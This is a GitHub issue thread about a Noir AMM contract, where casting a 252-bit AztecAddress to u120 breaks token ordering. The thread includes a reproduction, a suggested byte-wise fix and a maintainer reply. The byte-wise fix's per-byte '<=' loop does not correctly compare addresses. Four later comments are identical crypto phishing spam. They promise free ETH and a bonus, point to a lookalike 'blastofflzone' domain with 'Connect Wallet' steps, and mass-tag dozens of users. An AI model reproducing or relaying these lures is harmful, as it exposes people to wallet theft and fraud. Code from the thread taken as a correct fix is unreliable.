### ISSUE TITLE
[bug: main] AztecAddress casted to u120 leads to inconsistent ordering

### ISSUE THREAD

**Issue by drgorillamd** [olehmisar/aztec-amm#1]
https://github.com/olehmisar/aztec-amm/blob/ea1e57f2c266b3a37d8ebe5a7c9e8d7cd458eeab/src/contracts/amm/src/main.nr#L71C1-L72C1

Addresses are wrapper around a Field, which is 252 bits long. Downcasting to u120 effectively remove half of the address, leading to potential mistake in token ordering.

**Reproductible example:**
```Rust
        let address1 = AztecAddress::new(1);
        let address2 = AztecAddress::new(2);
        assert(address1.address as u120 < address2.address as u120, "First test failed");

        let address3 = AztecAddress::new(0x1000000000000000000000000000000000000000000000000000000000000000);
        let address4 = AztecAddress::new(0x2000000000000000000000000000000000000000000000000000000000000000);
        assert(address3.address as u120 == address4.address as u120, "Second test failed");
        assert(address3.address as u120 < address4.address as u120, "Third test failed");
```
In this snippet, only the third assert will throw.

**Suggested fix:**
Pseudocode:
> Split addresses in high and low bytes
> compare high bytes
> if high bytes are equals, compare low bytes

This can be implemented in a bit shift, which is a division under the Noir hood.

**Comment by drgorillamd** [comment]
It can be easily solved (with very few extra constraints) with a byte-wise conversion:

```Rust
        let address3 = AztecAddress::new(0x1000000000000000000000000000000000000000000000000000000000000000);
        let address4 = AztecAddress::new(0x2000000000000000000000000000000000000000000000000000000000000000);

        let address3_bytes = address3.address.to_be_bytes(32);
        let address4_bytes = address4.address.to_be_bytes(32);

        for i in 0..32 {
            assert(address3_bytes[i] <= address4_bytes[i], "Wrong ordering");
        }
        assert(address3.address != address4.address, "Wrong ordering");
 ```

**Comment by olehmisar** [comment]
I avoided this comparison in all functions except init

**Comment by GitSyncPromedia** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
DumasOlivier, @alexandrethsilva, @akhavr, @dlastwishes, @hec8214, @MarkKobs, @Masakore, @brendon-rofe, @nuruy, @AndreiD, @0xf4vul, @hcaw, @mfbevan, @markgk629, @jasper-fu, @cnzx219, @Fear-over, @Hudie, @publicqi, @jiangplus, @maguroid, @anthonybtedesco, @arekgotfryd, @hewigovens, @d0scoo1, @igingu, @safurrier, @davidbegin, @samnang, @ankyliu, @Eikix, @abstractumx, @huazhouwang, @jyfcrw, @Sefton4eva, @si3mshady, @vojtastefan, @stackdump, @h1nk, @jimmyshum, @piypil, @henrytirla, @themez, @AlizadeAlireza, @qianxun0, @ChinW, @ac019, @nickf12, @Cymatical, @Norfolks

**Comment by batu07040** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
sedatcans, @informaticacba, @jn-herrera, @DrDarbin, @ShevyTunde, @halay, @Nash48, @bobbyg603, @123-code, @mateochauchet, @nemolc, @foolstack-omg, @DarrenJoah, @sonm-usui, @Alexey808, @drunaar, @timzai, @ElegantWang, @Seabore, @TigerCcTech, @KBourdier, @ahbing, @wdcs-kushaltanna, @Ethanshanyu, @GossipakSelfForlife, @HyptoX, @ashleybelshe, @neocho, @gun8121, @YangLuchao, @amjad4554, @ashajjar, @ole-larsen, @Manan181, @alphafitz11, @hongyu315, @oussamarouabah, @wq599263163, @SimonMing47, @Ri31, @jnealew, @lemonness, @mkermani144, @daann1l, @umiotter, @serpro69, @wannabehero, @xmhuangzhen, @kingspink, @USER1696960

**Comment by batu07040** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
markusobermaier96, @OC0311, @furfio, @huyangcheng, @jovitakurniawan, @kongworldstone, @truongnhatanh7, @Akshat120, @difrule, @arkadiuszwojcik, @linusfm, @godraadam, @Jkpanchal, @Serenitychic, @sohokay, @FLAKEYCHALK, @11001100111011101110001, @Henrich-Tong, @SirFlickka, @atomburg, @egekandas, @SaintTheAce, @MonsterKey, @dogukanakkaya, @phucbienvan, @mooezz999, @flawlesscode254, @cosmicknox, @meokoken, @Shawnpku, @renatostavares, @StephanieIlievaa, @glary-fanfan, @progerwtf, @lamga199, @zachalam, @bijeebuss, @nailkong, @akarasev, @Christiandike, @kasmaldev, @Potasya, @bianandgan, @pahrurozidev, @honestbonsai, @javeed29, @JamesonBR, @BLR19, @Bxlencia, @0xbepresent

**Comment by jguzej** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
hwsun, @hannah-eichelsdoerfer, @eatskolnikov, @HydeSong, @dcamps-hacken, @rishisundar, @ps-89, @0xNumbuhFive, @yosvelquintero, @abrahamsangha, @Ptopic, @tconnolly11, @bcuff, @kokimame, @duktig666, @Kezanwar, @askender, @EmmaChanhy, @reachlin, @boy520520456, @imysh578, @matisilva, @caoer, @godwnwaswa, @kozlovzxc, @osaguild, @spuro, @Manik-Jain, @twzhangyang, @acexy, @sm-heard, @ZGKtob, @SaladJack, @MasterPauls, @408apple, @JovanniChen, @duringnone, @DmitryKorovyn, @xmichurin, @crimeminister, @ahbing, @ZZZDAD, @Mhnd3, @cgonc, @smilivoje, @carmelo-iriti, @realsuperstar, @spacejlyfish, @Oznerol92, @heronimus
